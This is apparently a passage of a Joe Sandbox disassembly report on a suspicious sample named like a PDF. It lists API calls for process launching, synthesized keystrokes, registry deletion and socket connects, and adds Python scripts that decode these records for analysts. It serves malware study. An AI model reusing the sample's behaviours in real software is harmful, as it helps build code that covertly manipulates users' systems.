                                                                          Similarity
                                                                          • API ID: MessageSendWindow$ButtonCheckedEnabledLong
                                                                          • String ID:
                                                                          • API String ID: 4072528602-0
                                                                          • Opcode ID: 5d5dfc1d3b2baed060dfeba37f70ea664126e816c7cc006547d2372adbabd8e8
                                                                          • Instruction ID: 3a090f7071b38ea1a19f8882e8906ef7fb410a39e336c18c535002f474c6298b
                                                                          • Opcode Fuzzy Hash: 5d5dfc1d3b2baed060dfeba37f70ea664126e816c7cc006547d2372adbabd8e8
                                                                          • Instruction Fuzzy Hash: E6717C74604205AFDB249F64C8D4FBABBF9FF4A300F1440A9E956D72A1CB39AD91CB50
                                                                          APIs
                                                                          • _memset.LIBCMT ref: 00B5F75C
                                                                          • _memset.LIBCMT ref: 00B5F825
                                                                          • ShellExecuteExW.SHELL32(?), ref: 00B5F86A
                                                                            • Part of subcall function 00AE9997: __itow.LIBCMT ref: 00AE99C2
                                                                            • Part of subcall function 00AE9997: __swprintf.LIBCMT ref: 00AE9A0C
                                                                            • Part of subcall function 00AFFEC6: _wcscpy.LIBCMT ref: 00AFFEE9
                                                                          • GetProcessId.KERNEL32(00000000), ref: 00B5F8E1
                                                                          • CloseHandle.KERNEL32(00000000), ref: 00B5F910
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1751845966.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                                                                           • Associated: 00000000.00000002.1751833036.0000000000AE0000.00000002.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000000.00000002.1751901747.0000000000B6F000.00000002.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000000.00000002.1751901747.0000000000B95000.00000002.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000000.00000002.1751942917.0000000000B9F000.00000004.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000000.00000002.1751958975.0000000000BA8000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_ae0000_SC_TR11670000_pdf.jbxd
                                                                          Similarity
                                                                          • API ID: _memset$CloseExecuteHandleProcessShell__itow__swprintf_wcscpy
                                                                          • String ID: @
                                                                          • API String ID: 3522835683-2766056989
                                                                          • Opcode ID: c384d8d2cc1f471da6610d7e67ff53714e11c72347cac6593b05835ea7781f0f
                                                                          • Instruction ID: 00cccd5b320adad02f39f42d33ea048757b9627ecfc4f51b5a8de224115e64ee
                                                                          • Opcode Fuzzy Hash: c384d8d2cc1f471da6610d7e67ff53714e11c72347cac6593b05835ea7781f0f
                                                                          • Instruction Fuzzy Hash: A8618C75A0065ADFCB14EF55C580AAEFBF4FF48310F1484A9E846AB391CB30AD45CB90
                                                                          APIs
                                                                          • GetParent.USER32(?), ref: 00B4149C
                                                                          • GetKeyboardState.USER32(?), ref: 00B414B1
                                                                          • SetKeyboardState.USER32(?), ref: 00B41512
                                                                          • PostMessageW.USER32(?,00000101,00000010,?), ref: 00B41540
                                                                          • PostMessageW.USER32(?,00000101,00000011,?), ref: 00B4155F
                                                                          • PostMessageW.USER32(?,00000101,00000012,?), ref: 00B415A5
                                                                          • PostMessageW.USER32(?,00000101,0000005B,?), ref: 00B415C8
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1751845966.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                                                                           • Associated: 00000000.00000002.1751833036.0000000000AE0000.00000002.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000000.00000002.1751901747.0000000000B6F000.00000002.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000000.00000002.1751901747.0000000000B95000.00000002.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000000.00000002.1751942917.0000000000B9F000.00000004.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000000.00000002.1751958975.0000000000BA8000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_ae0000_SC_TR11670000_pdf.jbxd
                                                                          Similarity
                                                                          • API ID: MessagePost$KeyboardState$Parent
                                                                          • String ID:
                                                                          • API String ID: 87235514-0
                                                                          • Opcode ID: 3c4fb671307f34ab6d578f75a0260e9a6c939d9c987adb22e975152979a3aa8f
                                                                          • Instruction ID: b6db0c7f03e3bf3a46ea763867a7d18f265bcdb469fbc6045abe366d9227a506
                                                                          • Opcode Fuzzy Hash: 3c4fb671307f34ab6d578f75a0260e9a6c939d9c987adb22e975152979a3aa8f
                                                                          • Instruction Fuzzy Hash: 5E51D3A0E047D53DFB36462C8C45BBA7FE99B46304F0848C9E1D5568C2D6E8DEC4EB50
                                                                          APIs
                                                                          • GetParent.USER32(00000000), ref: 00B412B5
                                                                          • GetKeyboardState.USER32(?), ref: 00B412CA
                                                                          • SetKeyboardState.USER32(?), ref: 00B4132B
                                                                          • PostMessageW.USER32(00000000,00000100,00000010,?), ref: 00B41357
                                                                          • PostMessageW.USER32(00000000,00000100,00000011,?), ref: 00B41374
                                                                          • PostMessageW.USER32(00000000,00000100,00000012,?), ref: 00B413B8
                                                                          • PostMessageW.USER32(00000000,00000100,0000005B,?), ref: 00B413D9
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1751845966.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                                                                           • Associated: 00000000.00000002.1751833036.0000000000AE0000.00000002.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000000.00000002.1751901747.0000000000B6F000.00000002.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000000.00000002.1751901747.0000000000B95000.00000002.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000000.00000002.1751942917.0000000000B9F000.00000004.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000000.00000002.1751958975.0000000000BA8000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_ae0000_SC_TR11670000_pdf.jbxd
                                                                          Similarity
                                                                          • API ID: MessagePost$KeyboardState$Parent
                                                                          • String ID:
                                                                          • API String ID: 87235514-0
                                                                          • Opcode ID: abd97e80fd4a99e877c7fd015d5d09cf44ab4cb739d2ee296a3e59c068b0dc6b
                                                                          • Instruction ID: 166c1fcec39bd0ab740ff5dc6c28b7c613628491b579e834b2672fafa4471db6
                                                                          • Opcode Fuzzy Hash: abd97e80fd4a99e877c7fd015d5d09cf44ab4cb739d2ee296a3e59c068b0dc6b
                                                                          • Instruction Fuzzy Hash: A051F6A0D047D53DFB3287288C55B7A7FE99B06300F0889C9E1D8968C2D794AED4F765
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1751845966.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                                                                           • Associated: 00000000.00000002.1751833036.0000000000AE0000.00000002.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000000.00000002.1751901747.0000000000B6F000.00000002.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000000.00000002.1751901747.0000000000B95000.00000002.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000000.00000002.1751942917.0000000000B9F000.00000004.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000000.00000002.1751958975.0000000000BA8000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_ae0000_SC_TR11670000_pdf.jbxd
                                                                          Similarity
                                                                          • API ID: _wcsncpy$LocalTime
                                                                          • String ID:
                                                                          • API String ID: 2945705084-0
                                                                          • Opcode ID: c85730d6aa8e912bc5111a72e589b09996b4715440e7a3d48427a6f94a262a8a
                                                                          • Instruction ID: 5049b6ff5544a3b96dd63232aa280d548b79d7eaca5d805ac2ead1cde081951d
                                                                          • Opcode Fuzzy Hash: c85730d6aa8e912bc5111a72e589b09996b4715440e7a3d48427a6f94a262a8a
                                                                          • Instruction Fuzzy Hash: 794193A5C20618B6CB10EBB4CC8A9DFBBECAF04710F508596F518E3162E734E715C7A9
                                                                          APIs
                                                                            • Part of subcall function 00B448AA: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00B438D3,?), ref: 00B448C7
                                                                            • Part of subcall function 00B448AA: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00B438D3,?), ref: 00B448E0
                                                                          • lstrcmpiW.KERNEL32(?,?), ref: 00B438F3
                                                                          • _wcscmp.LIBCMT ref: 00B4390F
                                                                          • MoveFileW.KERNEL32(?,?), ref: 00B43927
                                                                          • _wcscat.LIBCMT ref: 00B4396F
                                                                          • SHFileOperationW.SHELL32(?), ref: 00B439DB
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1751845966.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                                                                           • Associated: 00000000.00000002.1751833036.0000000000AE0000.00000002.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000000.00000002.1751901747.0000000000B6F000.00000002.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000000.00000002.1751901747.0000000000B95000.00000002.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000000.00000002.1751942917.0000000000B9F000.00000004.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000000.00000002.1751958975.0000000000BA8000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_ae0000_SC_TR11670000_pdf.jbxd
                                                                          Similarity
                                                                          • API ID: FileFullNamePath$MoveOperation_wcscat_wcscmplstrcmpi
                                                                          • String ID: \*.*
                                                                          • API String ID: 1377345388-1173974218
                                                                          • Opcode ID: cd71cbde51b35e2e8298b2728fc2ca3fe62738d236786ab6af7efb4de6d3892c
                                                                          • Instruction ID: 4f117027ba41385bb31012b93cbc3936ee9758920c2bf8b5145de30dfbaca0a7
                                                                          • Opcode Fuzzy Hash: cd71cbde51b35e2e8298b2728fc2ca3fe62738d236786ab6af7efb4de6d3892c
                                                                          • Instruction Fuzzy Hash: B94181B140C3849AC751EF64D485AEFB7E8EF88740F5409AEB48AC3191EB74D788C752
                                                                          APIs
                                                                          • _memset.LIBCMT ref: 00B67519
                                                                          • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00B675C0
                                                                          • IsMenu.USER32(?), ref: 00B675D8
                                                                          • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 00B67620
                                                                          • DrawMenuBar.USER32 ref: 00B67633
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1751845966.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                                                                           • Associated: 00000000.00000002.1751833036.0000000000AE0000.00000002.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000000.00000002.1751901747.0000000000B6F000.00000002.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000000.00000002.1751901747.0000000000B95000.00000002.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000000.00000002.1751942917.0000000000B9F000.00000004.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000000.00000002.1751958975.0000000000BA8000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_ae0000_SC_TR11670000_pdf.jbxd
                                                                          Similarity
                                                                          • API ID: Menu$Item$DrawInfoInsert_memset
                                                                          • String ID: 0
                                                                          • API String ID: 3866635326-4108050209
                                                                          • Opcode ID: 8aa834fbd5b01c142c1fcc40a4958b05c53dba6038d0a526e82faa3f2caf7563
                                                                          • Instruction ID: 2868849f701c46c52fa4a40c64aa126514512105be57b27cc5f456a0490c50bf
                                                                          • Opcode Fuzzy Hash: 8aa834fbd5b01c142c1fcc40a4958b05c53dba6038d0a526e82faa3f2caf7563
                                                                          • Instruction Fuzzy Hash: 9C415C75A05609EFDB10DF54D884EAABBF8FF05324F1480A9F91697290DB34AD50CF90
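The function records above are the Joe Sandbox IDA plugin's raw per-function output: API references with hexadecimal arguments and no naming of the Windows constants involved. The Python below is an added example, not Joe Sandbox's code and not code from the sample, that parses records in this layout and names the message constants, so that the PostMessageW calls at 00B41540 to 00B415C8 read as WM_KEYUP for VK_SHIFT, VK_CONTROL, VK_MENU and VK_LWIN (the WM_KEYDOWN twin at 00B41357 to 00B413D9 decodes the same way), and SendMessageW(?,000000A1,00000002,...) at 00B6B843 reads as WM_NCLBUTTONDOWN with HTCAPTION, a synthesized title-bar click. The record-layout regexes, the reading of `?` as an argument the analyzer could not resolve, the behaviour tags in `summarize`, and the SAMPLE text (abridged from this page) are this example's assumptions; the message and virtual-key values are the standard winuser.h constants.

```python
from __future__ import annotations

import re
from dataclasses import dataclass, field
from typing import Optional

# Constructed sample: three function records abridged from the report above
# (dump-source bookkeeping dropped; API lines and hashes kept verbatim).
SAMPLE = """\
APIs
• IsWindow.USER32(01070FB8), ref: 00B6B6A5
• SendMessageW.USER32(?,0000041C,00000000,00000000), ref: 00B6B795
• SendMessageW.USER32(01070FB8,000000B0,?,?), ref: 00B6B7CC
• GetWindowLongW.USER32(01070FB8,000000EC), ref: 00B6B82B
• SendMessageW.USER32(?,000000A1,00000002,00000000), ref: 00B6B843
• API ID: MessageSendWindow$ButtonCheckedEnabledLong
• Instruction Fuzzy Hash: E6717C74604205AFDB249F64C8D4FBABBF9FF4A300F1440A9E956D72A1CB39AD91CB50
APIs
• ShellExecuteExW.SHELL32(?), ref: 00B5F86A
  • Part of subcall function 00AE9997: __itow.LIBCMT ref: 00AE99C2
• GetProcessId.KERNEL32(00000000), ref: 00B5F8E1
• CloseHandle.KERNEL32(00000000), ref: 00B5F910
• API ID: _memset$CloseExecuteHandleProcessShell__itow__swprintf_wcscpy
• Instruction Fuzzy Hash: A8618C75A0065ADFCB14EF55C580AAEFBF4FF48310F1484A9E846AB391CB30AD45CB90
APIs
• GetParent.USER32(?), ref: 00B4149C
• GetKeyboardState.USER32(?), ref: 00B414B1
• SetKeyboardState.USER32(?), ref: 00B41512
• PostMessageW.USER32(?,00000101,00000010,?), ref: 00B41540
• PostMessageW.USER32(?,00000101,00000011,?), ref: 00B4155F
• PostMessageW.USER32(?,00000101,00000012,?), ref: 00B415A5
• PostMessageW.USER32(?,00000101,0000005B,?), ref: 00B415C8
• API ID: MessagePost$KeyboardState$Parent
• Instruction Fuzzy Hash: 5E51D3A0E047D53DFB36462C8C45BBA7FE99B46304F0848C9E1D5568C2D6E8DEC4EB50
"""

# One API reference line (layout assumed from this report). The optional
# "Part of subcall function X:" prefix marks a call made by a callee, not by
# the function itself. Module may be a DLL (USER32) or the CRT (LIBCMT).
API_RE = re.compile(
    r"^(?:Part of subcall function (?P<sub>[0-9A-F]+): )?"
    r"(?P<name>\w+)\.(?P<module>\w+)(?:\((?P<args>[^)]*)\))?,? ref: (?P<ref>[0-9A-F]+)$"
)
KV_RE = re.compile(r"^(?P<key>[A-Za-z ]+): ?(?P<val>.*)$")  # "API ID: ...", hashes, etc.
HEX8 = re.compile(r"^[0-9A-Fa-f]{8}$")  # a resolved argument; "?" is treated as unresolved

# Standard winuser.h constants for the messages that occur in these records.
WM = {0x0100: "WM_KEYDOWN", 0x0101: "WM_KEYUP", 0x00A1: "WM_NCLBUTTONDOWN", 0x00B0: "EM_GETSEL"}
VK = {0x10: "VK_SHIFT", 0x11: "VK_CONTROL", 0x12: "VK_MENU", 0x5B: "VK_LWIN"}
HIT = {0x02: "HTCAPTION"}


@dataclass
class ApiCall:
    name: str
    module: str
    args: list[str]
    ref: str
    subcall_of: Optional[str] = None


@dataclass
class FunctionRecord:
    calls: list[ApiCall] = field(default_factory=list)
    meta: dict[str, str] = field(default_factory=dict)


def parse_records(text: str) -> list[FunctionRecord]:
    """Split report text into records; 'Instruction Fuzzy Hash' is the last field of each."""
    records, cur = [], FunctionRecord()
    for raw in text.splitlines():
        line = raw.strip().lstrip("•").strip()
        m = API_RE.match(line)
        if m:
            args = [a.strip() for a in m["args"].split(",")] if m["args"] else []
            cur.calls.append(ApiCall(m["name"], m["module"], args, m["ref"], m["sub"]))
            continue
        m = KV_RE.match(line)
        if m:
            cur.meta[m["key"]] = m["val"].strip()
            if m["key"] == "Instruction Fuzzy Hash":
                records.append(cur)
                cur = FunctionRecord()
    return records


def decode_message(call: ApiCall) -> Optional[str]:
    """Name the message and wParam of a PostMessageW/SendMessageW call, e.g.
    'PostMessageW(WM_KEYUP VK_SHIFT)'. None for other APIs or an unresolved message."""
    if call.name not in ("PostMessageW", "SendMessageW") or len(call.args) < 3:
        return None
    msg, wparam = call.args[1], call.args[2]
    if not HEX8.match(msg):
        return None
    msg_name = WM.get(int(msg, 16), f"0x{int(msg, 16):04X}")
    detail = ""
    if HEX8.match(wparam):
        w = int(wparam, 16)
        if msg_name in ("WM_KEYDOWN", "WM_KEYUP"):
            detail = " " + VK.get(w, f"VK 0x{w:02X}")
        elif msg_name == "WM_NCLBUTTONDOWN":
            detail = " " + HIT.get(w, f"hit-test 0x{w:X}")
    return f"{call.name}({msg_name}{detail})"


def summarize(rec: FunctionRecord) -> list[str]:
    """Decoded messages plus coarse behaviour tags for one record (tags are this example's)."""
    names = {c.name for c in rec.calls}
    out = [f"{c.ref}: {d}" for c in rec.calls if (d := decode_message(c))]
    if {"GetKeyboardState", "SetKeyboardState", "PostMessageW"} <= names:
        out.append("synthesizes modifier key events to another window")
    if "ShellExecuteExW" in names:
        out.append("launches a child process via ShellExecuteExW")
    if any(decode_message(c) == "SendMessageW(WM_NCLBUTTONDOWN HTCAPTION)" for c in rec.calls):
        out.append("fakes a title-bar click (window drag) on a target window")
    return out
```

Run `summarize(r)` for each record from `parse_records(SAMPLE)` to get the decoded lines. Messages in the WM_USER range, such as 0x041C (WM_USER+28) at 00B6B795, are deliberately left as hex: their meaning depends on the window class of the receiving control, which these records do not show, so naming them without that context would be a guess.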
                                                                          APIs
                                                                          • RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?), ref: 00B6125C
                                                                          • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00B61286
                                                                          • FreeLibrary.KERNEL32(00000000), ref: 00B6133D
                                                                            • Part of subcall function 00B6122D: RegCloseKey.ADVAPI32(?), ref: 00B612A3
                                                                            • Part of subcall function 00B6122D: FreeLibrary.KERNEL32(?), ref: 00B612F5
                                                                            • Part of subcall function 00B6122D: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?), ref: 00B61318
                                                                          • RegDeleteKeyW.ADVAPI32(?,?), ref: 00B612E0
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1751845966.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                                                                           • Associated: 00000000.00000002.1751833036.0000000000AE0000.00000002.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000000.00000002.1751901747.0000000000B6F000.00000002.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000000.00000002.1751901747.0000000000B95000.00000002.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000000.00000002.1751942917.0000000000B9F000.00000004.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000000.00000002.1751958975.0000000000BA8000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_ae0000_SC_TR11670000_pdf.jbxd
                                                                          Similarity
                                                                          • API ID: EnumFreeLibrary$CloseDeleteOpen
                                                                          • String ID:
                                                                          • API String ID: 395352322-0
                                                                          • Opcode ID: 2e234b0abd76592771b3fd795db613567819a0708e914c4a7e7671ac4c322cd3
                                                                          • Instruction ID: 174a940506da77b5b77de1fd4b0be350cceaeb4ab72a309c5216ac63f23646e7
                                                                          • Opcode Fuzzy Hash: 2e234b0abd76592771b3fd795db613567819a0708e914c4a7e7671ac4c322cd3
                                                                          • Instruction Fuzzy Hash: 25312DB1901109BFDB14DF94EC99AFEB7BCEF08340F0405A9E502E3251DA789E459AA4
                                                                          APIs
                                                                          • SendMessageW.USER32(00000000,000000F0,00000000,00000000), ref: 00B6655B
                                                                          • GetWindowLongW.USER32(01070FB8,000000F0), ref: 00B6658E
                                                                          • GetWindowLongW.USER32(01070FB8,000000F0), ref: 00B665C3
                                                                          • SendMessageW.USER32(00000000,000000F1,00000000,00000000), ref: 00B665F5
                                                                          • SendMessageW.USER32(00000000,000000F1,00000001,00000000), ref: 00B6661F
                                                                          • GetWindowLongW.USER32(00000000,000000F0), ref: 00B66630
                                                                          • SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 00B6664A
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1751845966.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                                                                           • Associated: 00000000.00000002.1751833036.0000000000AE0000.00000002.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000000.00000002.1751901747.0000000000B6F000.00000002.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000000.00000002.1751901747.0000000000B95000.00000002.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000000.00000002.1751942917.0000000000B9F000.00000004.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000000.00000002.1751958975.0000000000BA8000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_ae0000_SC_TR11670000_pdf.jbxd
                                                                          Similarity
                                                                          • API ID: LongWindow$MessageSend
                                                                          • String ID:
                                                                          • API String ID: 2178440468-0
                                                                          • Opcode ID: bf5c996bd5e91dea88062ecdd812ec76ec5e76bcf7e1b3919568fafd9e09ac8c
                                                                          • Instruction ID: 625233d9e40d5799d55361af32f983b54394b7c44aaacca0df4f733938612611
                                                                          • Opcode Fuzzy Hash: bf5c996bd5e91dea88062ecdd812ec76ec5e76bcf7e1b3919568fafd9e09ac8c
                                                                          • Instruction Fuzzy Hash: F3310F70604255AFDB208F28EC86F653BE5FB5A710F1801A9F512CB2F6CB69AC40DB91
                                                                          APIs
                                                                            • Part of subcall function 00B580A0: inet_addr.WSOCK32(00000000,?,00000000,?,?,?,00000000), ref: 00B580CB
                                                                          • socket.WSOCK32(00000002,00000001,00000006,?,?,00000000), ref: 00B564D9
                                                                          • WSAGetLastError.WSOCK32(00000000), ref: 00B564E8
                                                                          • ioctlsocket.WSOCK32(00000000,8004667E,00000000), ref: 00B56521
                                                                          • connect.WSOCK32(00000000,?,00000010), ref: 00B5652A
                                                                          • WSAGetLastError.WSOCK32 ref: 00B56534
                                                                          • closesocket.WSOCK32(00000000), ref: 00B5655D
                                                                          • ioctlsocket.WSOCK32(00000000,8004667E,00000000), ref: 00B56576
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1751845966.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                                                                           • Associated: 00000000.00000002.1751833036.0000000000AE0000.00000002.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000000.00000002.1751901747.0000000000B6F000.00000002.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000000.00000002.1751901747.0000000000B95000.00000002.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000000.00000002.1751942917.0000000000B9F000.00000004.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000000.00000002.1751958975.0000000000BA8000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_ae0000_SC_TR11670000_pdf.jbxd
                                                                          Similarity
                                                                          • API ID: ErrorLastioctlsocket$closesocketconnectinet_addrsocket
                                                                          • String ID:
                                                                          • API String ID: 910771015-0
                                                                          • Opcode ID: f5f5f7c71bd916031c1e75a62838d41572e107eed895de8641346430cff718a5
                                                                          • Instruction ID: 919b772f810201770cb7ae49cb75a5ca03c7ace89d795c258d6b796da43466c0
                                                                          • Opcode Fuzzy Hash: f5f5f7c71bd916031c1e75a62838d41572e107eed895de8641346430cff718a5
                                                                          • Instruction Fuzzy Hash: 9131AF71600218AFEB10AF24DC85BBE7BE8EF54711F4480A9FD05A7291DB74AD09CBA1
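                                                                           The WSOCK32 sequence in this block (socket, ioctlsocket with FIONBIO, connect, WSAGetLastError, closesocket) is the shape of a connect-with-timeout helper: the socket is switched to non-blocking so that connect() returns at once and the caller polls or gives up, rather than a plain blocking connect. Reading that off the raw hex arguments is tedious, so the script below, added here as an example and not part of Joe Sandbox or of the analysed sample, parses the "APIs" lines of a function block, swaps well-known numeric arguments for their Windows SDK constant names, and flags the non-blocking-connect pattern. The sample block is copied from this page's listing; the constant values come from the Windows SDK headers (winsock2.h, commctrl.h, winuser.h, libloaderapi.h, wingdi.h) and also cover the SendMessageW, GetMenuStringW, LoadLibraryExW and GetStockObject arguments in the neighbouring blocks; the function names and the pattern check are the example's own.

```python
import re
from dataclasses import dataclass
from typing import List, Optional, Union

# Constructed input: the socket-helper block copied from this report's listing.
SAMPLE_BLOCK = """\
• Part of subcall function 00B580A0: inet_addr.WSOCK32(00000000,?,00000000,?,?,?,00000000), ref: 00B580CB
• socket.WSOCK32(00000002,00000001,00000006,?,?,00000000), ref: 00B564D9
• WSAGetLastError.WSOCK32(00000000), ref: 00B564E8
• ioctlsocket.WSOCK32(00000000,8004667E,00000000), ref: 00B56521
• connect.WSOCK32(00000000,?,00000010), ref: 00B5652A
• WSAGetLastError.WSOCK32 ref: 00B56534
• closesocket.WSOCK32(00000000), ref: 00B5655D
• ioctlsocket.WSOCK32(00000000,8004667E,00000000), ref: 00B56576
"""

# One report line: optional "Part of subcall function X:" prefix, then
# Api.Module(args), ref: addr   (the argument list is absent on some lines).
API_RE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<subfn>[0-9A-Fa-f]+):\s*)?"
    r"(?P<api>[A-Za-z_]\w*)\.(?P<mod>\w+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$"
)

# Values from the Windows SDK headers, keyed by (API name, zero-based arg index).
CONSTANTS = {
    ("socket", 0): {2: "AF_INET", 23: "AF_INET6"},
    ("socket", 1): {1: "SOCK_STREAM", 2: "SOCK_DGRAM"},
    ("socket", 2): {6: "IPPROTO_TCP", 17: "IPPROTO_UDP"},
    ("ioctlsocket", 1): {0x8004667E: "FIONBIO", 0x4004667F: "FIONREAD"},
    ("SendMessageW", 1): {0x30: "WM_SETFONT", 0xF0: "BM_GETCHECK", 0xF1: "BM_SETCHECK",
                          0x111: "WM_COMMAND", 0x401: "PBM_SETRANGE", 0x402: "PBM_SETPOS",
                          0x404: "PBM_SETSTEP", 0x409: "PBM_SETBARCOLOR",
                          0x2001: "PBM_SETBKCOLOR"},
    ("PostMessageW", 1): {0x111: "WM_COMMAND"},
    ("GetMenuStringW", 4): {0x400: "MF_BYPOSITION"},
    ("LoadLibraryExW", 2): {0x800: "LOAD_LIBRARY_SEARCH_SYSTEM32"},
    ("GetStockObject", 0): {0x11: "DEFAULT_GUI_FONT"},
}

Arg = Union[int, str]   # int for hex literals, str for '?' and string literals


@dataclass
class ApiCall:
    api: str
    module: str
    args: List[Arg]
    ref: int                          # address of the call site
    subcall_of: Optional[int] = None  # set for "Part of subcall function" lines


def parse_arg(tok: str) -> Arg:
    tok = tok.strip()
    if tok in ("", "?"):
        return "?"
    try:
        return int(tok, 16)           # '-00000001' parses as -1
    except ValueError:
        return tok                    # e.g. 'combase.dll', 'RoInitialize'


def parse_block(text: str) -> List[ApiCall]:
    calls = []
    for line in text.splitlines():
        m = API_RE.match(line)
        if not m:
            continue
        args = [parse_arg(t) for t in m["args"].split(",")] if m["args"] is not None else []
        sub = int(m["subfn"], 16) if m["subfn"] else None
        calls.append(ApiCall(m["api"], m["mod"], args, int(m["ref"], 16), sub))
    return calls


def render(call: ApiCall) -> str:
    """Re-emit a call with known numeric arguments replaced by their SDK names."""
    out = []
    for i, a in enumerate(call.args):
        if isinstance(a, int):
            name = CONSTANTS.get((call.api, i), {}).get(a)
            out.append(name or (f"{a:#x}" if a else "0"))
        else:
            out.append(a)
    prefix = f"[sub {call.subcall_of:08X}] " if call.subcall_of is not None else ""
    return f"{prefix}{call.api}.{call.module}({', '.join(out)}) @ {call.ref:08X}"


def is_nonblocking_connect(calls: List[ApiCall]) -> bool:
    """True when the function's own calls (subcalls excluded) create a TCP
    socket, set FIONBIO on it and then connect(): the shape of a
    connect-with-timeout helper rather than a plain blocking connect."""
    own = [c for c in calls if c.subcall_of is None]
    names = [c.api for c in own]
    if not {"socket", "ioctlsocket", "connect"} <= set(names):
        return False
    i_sock, i_ioctl, i_conn = (names.index(n) for n in ("socket", "ioctlsocket", "connect"))
    tcp = own[i_sock].args[:3] == [2, 1, 6]
    fionbio = own[i_ioctl].args[1:2] == [0x8004667E]
    return tcp and fionbio and i_sock < i_ioctl < i_conn


if __name__ == "__main__":
    parsed = parse_block(SAMPLE_BLOCK)
    for c in parsed:
        print(render(c))
    print("non-blocking connect helper:", is_nonblocking_connect(parsed))
```

                                                                           Run it on any block pasted from this page; the decoded output for the block above reads socket.WSOCK32(AF_INET, SOCK_STREAM, IPPROTO_TCP, ?, ?, 0) followed by ioctlsocket.WSOCK32(0, FIONBIO, 0), which is what makes the helper recognisable. The constant table is deliberately small and keyed by argument position, so a hit is only claimed where the SDK meaning of that slot is unambiguous; unknown values stay as hex.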
                                                                          APIs
